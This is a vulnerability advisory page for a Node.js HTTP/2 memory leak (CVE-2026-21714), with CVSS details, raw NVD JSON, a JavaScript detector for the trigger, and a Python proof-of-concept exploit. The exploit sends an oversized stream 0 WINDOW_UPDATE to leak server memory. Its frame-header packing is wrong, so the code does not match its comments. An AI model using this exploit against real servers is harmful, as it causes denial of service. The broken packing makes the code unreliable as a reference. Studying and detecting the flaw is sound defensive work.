Security Vulnerability Report
CVE-2026-21714 CVSS 5.3 MEDIUM

CVE-2026-21714

Published: 2026-03-30 20:16:20
Last Modified: 2026-04-01 14:24:22

Description

A memory leak occurs in Node.js HTTP/2 servers when a client sends WINDOW_UPDATE frames on stream 0 (connection-level) that cause the flow control window to exceed the maximum value of 2³¹-1. The server correctly sends a GOAWAY frame, but the Http2Session object is never cleaned up. This vulnerability affects HTTP2 users on Node.js 20, 22, 24 and 25.
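The trigger condition described above can be checked for in captured traffic. The following is an added example, not code from this advisory or from the Node.js project: it walks the client-to-server bytes of one decrypted HTTP/2 connection and reports each stream 0 WINDOW_UPDATE that would push the connection window past 2³¹-1. The function name, constant names and the sample capture are assumptions made for illustration; the frame layout and the 65535 initial connection window come from RFC 9113.

```javascript
// Added example, not code from the Node.js project. Frame layout and limits
// follow RFC 9113; function and constant names are hypothetical.
const MAX_WINDOW = 2 ** 31 - 1;      // largest legal flow-control window
const INITIAL_CONN_WINDOW = 65535;   // connection window always starts here
const PREFACE = Buffer.from('PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n', 'latin1');
const WINDOW_UPDATE = 0x8;
const hex = (s) => Buffer.from(s.replace(/\s+/g, ''), 'hex');

// Scan the client-to-server bytes of one captured HTTP/2 connection and
// report every stream-0 WINDOW_UPDATE that pushes the window past 2^31-1.
function findConnectionWindowOverflows(capture) {
  const hasPreface = capture.subarray(0, PREFACE.length).equals(PREFACE);
  let pos = hasPreface ? PREFACE.length : 0;
  let connWindow = INITIAL_CONN_WINDOW;
  const findings = [];
  while (pos + 9 <= capture.length) {
    const length = capture.readUIntBE(pos, 3);                    // 24-bit length
    const type = capture.readUInt8(pos + 3);
    const streamId = capture.readUInt32BE(pos + 5) & 0x7fffffff;  // drop reserved bit
    const end = pos + 9 + length;
    if (end > capture.length) break;                              // truncated final frame
    if (type === WINDOW_UPDATE && streamId === 0 && length === 4) {
      const increment = capture.readUInt32BE(pos + 9) & 0x7fffffff;
      if (connWindow + increment > MAX_WINDOW) {
        findings.push({ offset: pos, increment, window: connWindow,
          wouldBe: connWindow + increment });
      } else {
        connWindow += increment;                                  // legal update: track it
      }
    }
    pos = end;
  }
  return findings;
}

// Constructed sample capture (not real traffic).
const SAMPLE = Buffer.concat([
  PREFACE,
  hex('000000 04 00 00000000'),           // SETTINGS, empty payload
  hex('000004 08 00 00000000 00010000'),  // WINDOW_UPDATE stream 0, +65536
  hex('000004 08 00 00000001 7fff0000'),  // WINDOW_UPDATE stream 1, ignored here
  hex('000004 08 00 00000000 7fff0000'),  // WINDOW_UPDATE stream 0, overflows
]);

console.log(findConnectionWindowOverflows(SAMPLE));
```

A finding marks a connection on which the server should have answered with GOAWAY; whether the corresponding Http2Session was actually released still has to be confirmed on the server side, for example from heap growth over time.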

CVSS Details

CVSS Score: 5.3
Severity: MEDIUM
CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L

Configurations (Affected Products)

No configuration data available.

Node.js 20.x
Node.js 22.x
Node.js 24.x
Node.js 25.x

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import socket
import struct

# Target Node.js HTTP/2 Server
HOST = '127.0.0.1'
PORT = 8080

# HTTP/2 Connection Preface
preface = b'PRI * HTTP/2.0\r\n\r\nSM\r\n\r\n'

# Settings Frame (Empty ACK to establish connection)
# Length: 0, Type: 4 (SETTINGS), Flags: 1 (ACK), Stream: 0
settings_ack = struct.pack('>HBBBL', 0, 4, 1, 0, 0)

# WINDOW_UPDATE Frame on Stream 0
# Increment value that pushes window > 2^31 - 1
# Length: 4, Type: 8 (WINDOW_UPDATE), Flags: 0, Stream: 0
window_increment = 2**31
window_update_frame = struct.pack('>HBBBLI', 4, 8, 0, 0, window_increment)

def send_exploit():
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect((HOST, PORT))
    s.send(preface)
    s.send(settings_ack)
    # Send malicious WINDOW_UPDATE to trigger leak
    s.send(window_update_frame)
    print("[+] Malicious WINDOW_UPDATE sent. Check server memory usage.")
    s.close()

if __name__ == "__main__":
    send_exploit()
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-21714", "sourceIdentifier": "[email protected]", "published": "2026-03-30T20:16:19.573", "lastModified": "2026-04-01T14:24:21.833", "vulnStatus": "Awaiting Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "A memory leak occurs in Node.js HTTP/2 servers when a client sends WINDOW_UPDATE frames on stream 0 (connection-level) that cause the flow control window to exceed the maximum value of 2³¹-1. The server correctly sends a GOAWAY frame, but the Http2Session object is never cleaned up.\r\n\r\nThis vulnerability affects HTTP2 users on Node.js 20, 22, 24 and 25."}, {"lang": "es", "value": "Se produce una fuga de memoria en servidores HTTP/2 de Node.js cuando un cliente envía tramas WINDOW_UPDATE en el flujo 0 (a nivel de conexión) que hacen que la ventana de control de flujo exceda el valor máximo de 2³¹-1. El servidor envía correctamente una trama GOAWAY, pero el objeto Http2Session nunca se limpia.\n\nEsta vulnerabilidad afecta a los usuarios de HTTP2 en Node.js 20, 22, 24 y 25."}], "metrics": {"cvssMetricV30": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.0", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-401"}]}], "references": [{"url": "https://nodejs.org/en/blog/vulnerability/march-2026-security-releases", "source": "[email protected]"}]}}